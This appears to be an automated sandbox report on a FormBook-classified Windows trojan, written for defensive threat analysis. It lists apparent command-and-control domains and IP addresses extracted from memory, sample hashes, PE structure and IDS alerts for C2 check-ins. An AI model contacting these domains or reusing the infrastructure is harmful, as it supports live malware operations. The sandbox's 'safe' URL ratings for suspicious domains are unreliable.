                                                                                    http://www.orean-course-289113002.zone/m25s/explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://www.fonts.comTU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.sandoll.co.krTU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.xewaov.xyz/m25s/explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.6874.clubReferer:explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.ax-th-6011838.fyi/m25s/explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.attoomasteracademy.onlineexplorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.cskuvq.shop/m25s/oexplorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.uykoii.shop/m25s/explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.xewaov.xyzReferer:explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.araghospitality.netReferer:explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://www.anforexuytin.cfdexplorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://www.fontbureau.com/designers/cabarga.htmlNTU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.founder.com.cn/cnTU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.cskuvq.shop/m25s/explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.armanshop.xyzReferer:explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.olnacasinotcs14.topexplorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.armanshop.xyzexplorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.dt5r.shop/m25s/www.cctofi.cpaexplorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.msn.com:443/en-us/feedexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.cleans.xyz/m25s/explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          unknown
                                                                                                          https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.cskuvq.shop/m25s/www.olnacasinotcs14.topexplorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://www.ierra777.vip/m25s/www.cskuvq.shopexplorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://www.pringhillinfos.netexplorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://www.attoomasteracademy.online/m25s/www.raphic-design-degree-33148.bondexplorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://excel.office.comexplorer.exe, 00000004.00000002.2638429604.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1716978522.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2687008894.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2690919232.00000000097A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.6uzh.digital/m25s/explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.sajatypeworks.comTU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.founder.com.cn/cn/cTheTU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.anforexuytin.cfd/m25s/www.ildcraft.xyzexplorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://www.ildcraft.xyzReferer:explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://www.wistlnc.net/m25s/www.armanshop.xyzexplorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://www.wistlnc.net/m25s/explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://outlook.com2025-01-10T1explorer.exe, 0000000F.00000003.2687008894.000000000978C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
IP: 13.248.169.48
Domain: www.cleans.xyz
Country: United States
ASN: 16509
ASN Name: AMAZON-02 US
Malicious: true
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1587624
Start date and time: 2025-01-10 15:54:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: TU0kiz3mxz.exe
renamed because original name is a hash value
Original Sample Name: 20fdf7fbe573d9233084f2f338379815159e9c057a5b1189f8007d3ccf0e4204.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@24/1@12/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 164
• Number of non-executed functions: 288
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe, StartMenuExperienceHost.exe, TextInputHost.exe, mobsync.exe
• Excluded IPs from analysis (whitelisted): 204.79.197.203, 184.28.90.27, 4.245.163.56, 13.107.246.45, 20.190.160.20, 2.23.227.208, 2.23.227.215
• Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, r.bing.com, a-0003.a-msedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, api-msn-com.a-0003.a-msedge.net
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtEnumerateValueKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Report size getting too big, too many NtSetValueKey calls found.
Time | Type | Description
09:55:07 | API Interceptor | 1x Sleep call for process: TU0kiz3mxz.exe modified
09:55:36 | API Interceptor | 7770381x Sleep call for process: explorer.exe modified
Match: 13.248.169.48
Associated Sample Name / URL | Detection | Threat Name | Context
QUOTATION#050125.exe | malicious | FormBook | www.bonheur.tech/t3iv/
QUOTATION#050125.exe | malicious | FormBook | www.bonheur.tech/t3iv/
ORDER REF 47896798 PSMCO.exe | malicious | FormBook, PureLog Stealer | www.londonatnight.coffee/13to/
236236236.elf | malicious | Unknown | portlandbeauty.com/
profroma invoice.exe | malicious | FormBook | www.aktmarket.xyz/wb7v/
SC_TR11670000_pdf.exe | malicious | FormBook | www.xphone.net/i7vz/
RFQ_P.O.1212024.scr | malicious | FormBook | www.krshop.shop/5p01/
SH8ZyOWNi2.exe | malicious | CMSBrute | sharewood.xyz/administrator/index.php
MA-DS-2024-03 URGENT.exe | malicious | FormBook | www.snyp.shop/4nyz/
Recibos.exe | malicious | FormBook | www.egyshare.xyz/lp5b/
Match: AMAZON-02US
Associated Sample Name / URL | Detection | Threat Name | Context
https://booking.extrantelabelason.com/ | malicious | CAPTCHA Scam ClickFix | 18.245.31.49
https://samantacatering.com/ | malicious | Unknown | 99.86.4.125
https://www.filemail.com/d/rxythqchkhluipl?skipreg=true | malicious | Unknown | 18.245.46.20
vevhea4.elf | malicious | Unknown | 54.171.230.55
file.elf | malicious | Unknown | 13.251.16.150
file.elf | malicious | Unknown | 13.251.16.150
file.elf | malicious | Unknown | 54.171.230.55
file.elf | malicious | Unknown | 54.217.10.153
https://app.planable.io/review/0OPaw36t6M_k | malicious | HTMLPhisher | 52.17.171.17
https://we.tl/t-fnebgmrnYQ | malicious | Unknown | 18.245.46.98
Process: C:\Users\user\Desktop\TU0kiz3mxz.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.484341258502357
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: TU0kiz3mxz.exe
File size: 766'976 bytes
MD5: 5bc818a30e4d9d8a6bb828767ca1bf2a
SHA1: b0ce6d58037a4f05cb31eeca7db4ad2c347bc358
SHA256: 20fdf7fbe573d9233084f2f338379815159e9c057a5b1189f8007d3ccf0e4204
SHA512: d4d674c4cc0484160b4458cfbf6c670b066536241b9888c9b022ca2ee5bdf83e35153508ba5a5cd6127bab53704d8af49e89dcd2c92de9fd110f1164d34db3d2
SSDEEP: 12288:6EUHsWksNFwTFMKh5EOU30lLG6wVxm0f8dIqCSzy+MbM+jikHUUkLItauQmE:YsWfY+sy30lLG5xm+87CSzEE+PtaoE
TLSH: 03F4AE1476948F63CA7587F53872E0B413FC1EAEA01AE2555DC17EEB79A2F048960F83
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................... ............@................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x4bc606
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0xACB40EDC [Tue Oct 25 15:57:16 2061 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                    Instruction
                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc5b4 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xbe000 | 0x61c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb858c | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xba60c | 0xba800 | 42fd04aad6990950b56a2310c89daa58 | False | 0.797321391169571 | data | 7.494852033166654 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xbe000 | 0x61c | 0x800 | bfced1245c18d9767e805d0a97c4c03f | False | 0.33740234375 | data | 3.4550048540377016 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc0000 | 0xc | 0x200 | 38f373e2917327444b1b1cc39b428246 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xbe090 | 0x38c | PGP symmetric key encrypted data - Plaintext or unencrypted data | | | 0.42290748898678415
RT_MANIFEST | 0xbe42c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T15:56:25.112677+0100 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49868 | 13.248.169.48 | 80 | TCP
2025-01-10T15:56:25.112677+0100 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49868 | 13.248.169.48 | 80 | TCP
2025-01-10T15:56:25.112677+0100 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49868 | 13.248.169.48 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 15:56:24.638166904 CET | 49868 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 15:56:24.643271923 CET | 80 | 49868 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 15:56:24.643840075 CET | 49868 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 15:56:24.644000053 CET | 49868 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 15:56:24.648725033 CET | 80 | 49868 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 15:56:25.112427950 CET | 80 | 49868 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 15:56:25.112606049 CET | 80 | 49868 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 15:56:25.112637043 CET | 49868 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 15:56:25.112677097 CET | 49868 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 15:56:25.117490053 CET | 80 | 49868 | 13.248.169.48 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 15:55:43.640054941 CET | 55841 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:55:43.649667978 CET | 53 | 55841 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 15:56:05.405122042 CET | 60470 | 53 | 192.168.2.4 | 1.1.1.1
